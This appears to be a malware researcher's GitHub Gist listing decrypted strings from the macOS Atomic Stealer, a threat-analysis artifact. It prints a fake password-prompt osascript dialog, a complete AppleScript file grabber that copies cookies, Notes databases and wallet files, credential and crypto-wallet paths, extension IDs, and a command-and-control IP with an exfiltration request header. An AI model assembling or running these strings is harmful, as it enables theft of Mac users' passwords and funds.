Last active
January 16, 2024 08:40
-
-
Save RussianPanda95/c74ac42f58983d08ca50cedac960065a to your computer and use it in GitHub Desktop.
Atomic Stealer decrypted strings
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Decrypted string at address 0x1000224f2: osascript -e 'display dialog "Required Application Helper. Please enter passphrase for | |
| Decrypted string at LEA: ." default answer "" with icon caution buttons {"Continue"} default button "Continue" giving up after 150 with title "Application wants to install helper" with hidden answer' at 0x100022629 | |
| Decrypted string at address 0x10002278a: | |
| Decrypted string at address 0x100022b9e: pwd | |
| Decrypted string at address 0x10002aa3c: Chromium/ | |
| Decrypted string at address 0x10002ad8d: Profile | |
| Decrypted string at address 0x10002c328: /cookies.sqlite | |
| Decrypted string at address 0x10002c5cd: /formhistory.sqlite | |
| Decrypted string at address 0x10002c872: /key4.db | |
| Decrypted string at address 0x10002cb17: /logins.json | |
| Decrypted string at address 0x10002e3ba: POST /p2p HTTP/1.1Host: | |
| Decrypted string at address 0x10002e667: :80uuid: | |
| Decrypted string at address 0x10002e8fa: 7bc8f87e-c842-47c7-8f05-10e2be357888 | |
| Decrypted string at address 0x10002eb8d: Content-Length: | |
| Decrypted string at address 0x10002f942: USER | |
| Decrypted string at address 0x10002fbc6: /Users/ | |
| Decrypted string at address 0x10002ffe4: /fg/ | |
| Decrypted string at address 0x10003027a: FileGrabber/ | |
| Decrypted string at address 0x10003054c: username | |
| Decrypted string at address 0x1000307db: system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType | |
| Decrypted string at address 0x100030a7d: user | |
| Decrypted string at address 0x100030d18: /Library/Application Support/ | |
| Decrypted string at address 0x100030fab: /Library/Cookies/Cookies.binarycookies | |
| Decrypted string at address 0x100031251: safari/saf1 | |
| Decrypted string at address 0x1000314ec: /.config/filezilla/recentservers.xml | |
| Decrypted string at address 0x100031792: FileZilla/recentservers.xml | |
| Decrypted string at address 0x100031a5b: Chrome | |
| Decrypted string at address 0x100031d03: Google | |
| Decrypted string at address 0x100031ffc: Brave | |
| Decrypted string at address 0x1000322a4: BraveSoftware/Brave-Browser/ | |
| Decrypted string at address 0x10003259d: Edge | |
| Decrypted string at address 0x100032842: Microsoft Edge/ | |
| Decrypted string at address 0x100032b3b: Opera | |
| Decrypted string at address 0x100032de3: com.operasoftware.Opera/ | |
| Decrypted string at address 0x1000330dc: OperaGX | |
| Decrypted string at address 0x100033384: com.operasoftware.OperaGX/ | |
| Decrypted string at address 0x10003367d: Vivaldi | |
| Decrypted string at address 0x100033922: Vivaldi/ | |
| Decrypted string at address 0x10003467a: Firefox/Profiles/ | |
| Decrypted string at address 0x100034956: /Library/Keychains/login.keychain-db | |
| Decrypted string at address 0x100034bfc: keychain | |
| Decrypted string at address 0x100034e94: Binance/app-store.json | |
| Decrypted string at address 0x10003513d: deskwallets/Binance/app-store.json | |
| Decrypted string at address 0x100035409: deskwallets/Electrum/ | |
| Decrypted string at address 0x1000356ae: /.electrum/wallets/ | |
| Decrypted string at address 0x1000359aa: deskwallets/Coinomi/ | |
| Decrypted string at address 0x100035c52: Coinomi/wallets/ | |
| Decrypted string at address 0x100035f4b: deskwallets/Exodus/ | |
| Decrypted string at address 0x1000361f3: Exodus/ | |
| Decrypted string at address 0x1000364ec: deskwallets/Atomic/ | |
| Decrypted string at address 0x100036791: atomic/Local Storage/leveldb/ | |
| Decrypted string at address 0x1000372b1: 5.42.65.108 | |
| Decrypted string at address 0x1000439c1: .DS_Store | |
| Decrypted string at address 0x100043c69: Partitions | |
| Decrypted string at address 0x100043f0e: Code Cache | |
| Decrypted string at address 0x1000447a1: /Cookies | |
| Decrypted string at address 0x100044a46: /Network/Cookies | |
| Decrypted string at address 0x100044ceb: /Login Data | |
| Decrypted string at address 0x1000453a4: ibnejdfjmmkpcnlpebklmnkoeoihofec | |
| Decrypted string at address 0x100045649: nkbihfbeogaeaoehlefnkodbefgpgknn | |
| Decrypted string at address 0x1000458f1: bocpokimicclpaiekenaeelehdjllofo | |
| Decrypted string at address 0x100045b96: nphplpgoakhhjchkkhmiggakijnkhfnd | |
| Decrypted string at address 0x100045e3b: pocmplpaccanhmnllbbkpgfliimjljgo | |
| Decrypted string at address 0x1000460e0: mfhbebgoclkghebffdldpobeajmbecfk | |
| Decrypted string at address 0x100046385: fhilaheimglignddkjgofkcbgekhenbh | |
| Decrypted string at address 0x10004662a: hnhobjmcibchnmglfbldbfabcgaknlkj | |
| Decrypted string at address 0x1000468d2: apnehcjmnengpnmccpaibjmhhoadaico | |
| Decrypted string at address 0x100046b7a: cjmkndjhnagcfbpiemnkdpomccnjblmj | |
| Decrypted string at address 0x100046e22: cmndjbecilbocjfkibfbifhngkdmjgog | |
| Decrypted string at address 0x1000470ca: pnndplcbkakcplkjnolgbkdgjikjednm | |
| Decrypted string at address 0x10004736f: dhgnlgphgchebgoemcjekedjjbifijid | |
| Decrypted string at address 0x100047617: fhbohimaelbohpjbbldcngcnapndodjp | |
| Decrypted string at address 0x1000478bf: ffnbelfdoeiohenkjibnmadjiehjhajb | |
| Decrypted string at address 0x100047b67: afbcbjpbpfadlkmhmclhkeeodmamcflc | |
| Decrypted string at address 0x100047e0c: hnfanknocfeofbddgcijnmhnfnkdnaad | |
| Decrypted string at address 0x1000480b4: hpglfhgfnhbgpjdenjgmdgoeiappafln | |
| Decrypted string at address 0x100048359: cjelfplplebdjjenllpjcblmjkfcffne | |
| Decrypted string at address 0x100048601: kncchdigobghenbbaddojjnnaogfppfj | |
| Decrypted string at address 0x1000488a6: amkmjjmmflddogmhpjloimipbofnfjih | |
| Decrypted string at address 0x100048b4e: nlbmnnijcnlegkjjpcfjclmcfggfefdm | |
| Decrypted string at address 0x100048df3: ppdadbejkmjnefldpcdjhnkpbjkikoip | |
| Decrypted string at address 0x10004909b: fnjhmkhhmkbjkkabndcnnogagogbneec | |
| Decrypted string at address 0x100049340: cphhlgmgameodnhkjdmkpanlelnlohao | |
| Decrypted string at address 0x1000495e8: nhnkbkgjikgcigadomkphalanndcapjk | |
| Decrypted string at address 0x10004988d: kpfopkelmapcoipemfendmdcghnegimn | |
| Decrypted string at address 0x100049b35: copjnifcecdedocejpaapepagaodgpbh | |
| Decrypted string at address 0x100049ddd: aiifbnbfobpmeekipheeijimdpnlpgpp | |
| Decrypted string at address 0x10004a082: dmkamcknogkgcdfhhbddcghachkejeap | |
| Decrypted string at address 0x10004a32a: cnmamaachppnkjgnildpdmkaakejnhae | |
| Decrypted string at address 0x10004a5d2: jojhfeoedkpkglbfimdfabpdfjaoolaf | |
| Decrypted string at address 0x10004a877: flpiciilemghbmfalicajoolhkkenfel | |
| Decrypted string at address 0x10004ab1c: nknhiehlklippafakaeklbeglecifhad | |
| Decrypted string at address 0x10004adc4: hcflpincpppdclinealmandijcmnkbgn | |
| Decrypted string at address 0x10004b069: ookjlbkiijinhpmnjffcofjonbfbgaoc | |
| Decrypted string at address 0x10004b30e: mnfifefkajgofkcjkemidiaecocnkjeh | |
| Decrypted string at address 0x10004b5b6: hmeobnfnfcmdkdcmlblgagmfpfboieaf | |
| Decrypted string at address 0x10004b85b: dkdedlpgdmmkkfjabffeganieamfklkm | |
| Decrypted string at address 0x10004bb00: nlgbhdfgdhgbiamfdfmbikcdghidoadd | |
| Decrypted string at address 0x10004bda5: cihmoadaighcejopammfbmddcmdekcje | |
| Decrypted string at address 0x10004c04d: lodccjjbdhfakaekdiahmedfbieldgik | |
| Decrypted string at address 0x10004c2f2: bcopgchhojmggmffilplmbdicgaihlkp | |
| Decrypted string at address 0x10004c59a: klnaejjgbibmhlephnhpmaofohgkpgkd | |
| Decrypted string at address 0x10004c842: aeachknmefphepccionboohckonoeemg | |
| Decrypted string at address 0x10004cae7: fnnegphlobjdpkhecapkijjdkgcjhkib | |
| Decrypted string at address 0x10004cd8f: pdadjkfkgcafgbceimcpbkalnfnepbnk | |
| Decrypted string at address 0x10004d034: acmacodkjbdgmoleeebolmdjonilkdbch | |
| Decrypted string at address 0x10004d2dc: bfnaelmomeimhlpmgjnjophhpkkoljpa | |
| Decrypted string at address 0x10004d581: cgeeodpfagjceefieflmdfphplkenlfk | |
| Decrypted string at address 0x10004d829: imloifkgjagghnncjkhggdhalmcnfklk | |
| Decrypted string at address 0x10004dace: aholpfdialjgjfhomihkjbmgjidlcdno | |
| Decrypted string at address 0x10004dd76: egjidjbpglichdcondbcbdnbeeppgdph | |
| Decrypted string at address 0x10004e01b: efbglgofoippbgcjepnhiblaibcnclgk | |
| Decrypted string at address 0x10004e2c3: opcgpfmipidbgpenhmajoajpbobppdil | |
| Decrypted string at address 0x10004e568: hifafgmccdpekplomjjkcfgodnhcellj | |
| Decrypted string at address 0x10004e810: ojggmchlghnjlapmfbnjholfjkiidbch | |
| Decrypted string at address 0x10004eab8: jnlgamecbpmbajjfhmmmlhejkemejdma | |
| Decrypted string at address 0x10004ed60: dlcobpjiigpikoobohmabehhmhfoodbb | |
| Decrypted string at address 0x10004f005: ebfidpplhabeedpnhjnobghokpiioolj | |
| Decrypted string at address 0x10004f2ad: loinekcabhlmhjjbocijdoimmejangoa | |
| Decrypted string at address 0x10004f555: ejjladinnckdgjemekebdpeokbikhfci | |
| Decrypted string at address 0x10004f7fd: phkbamefinggmakgklpkljjmgibohnba | |
| Decrypted string at address 0x10004faa5: ppbibelpcjmhbdihakflkdcoccbgbkpo | |
| Decrypted string at address 0x100021efe: dscl . authonly " | |
| Decrypted string at address 0x10002afee: Default | |
| Decrypted string at address 0x10002b1fb: Snapshots | |
| Decrypted string at address 0x10002dcf5: masterpass-chrome | |
| Decrypted string at address 0x10003adbc: osascript -e 'tell application "Terminal" to close first window' & exit | |
| Decrypted string at LEA: osascript -e 'set destinationFolderPath to (path to home folder as text) & "fg:" set extensionsList to {"txt","png","jpg","jpeg","wallet","keys","key"} set bankSize to 0 tell application "Finder" set username to short user name of (system info) try if not (exists folder destinationFolderPath) then make new folder at (path to home folder) with properties {name:"fg"} end if set safariFolder to ((path to library folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:") try duplicate file "Cookies.binarycookies" of folder safariFolder to folder destinationFolderPath with replacing end try set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:" try set notesFolder to folder notesFolderPath set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder repeat with aFile in notesFiles set fileSize to size of aFile if (bankSize + fileSize) 10 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + fileSize end try else exit repeat end if end repeat end try set desktopFiles to every file of desktop set documentsFiles to every file of folder "Documents" of (path to home folder) repeat with aFile in (desktopFiles & documentsFiles) set fileExtension to name extension of aFile if fileExtension is in extensionsList then set fileSize to size of aFile if (bankSize + fileSize) 10 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + fileSize end try else exit repeat end if end if end repeat end try end tell' at 0x10004443c |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment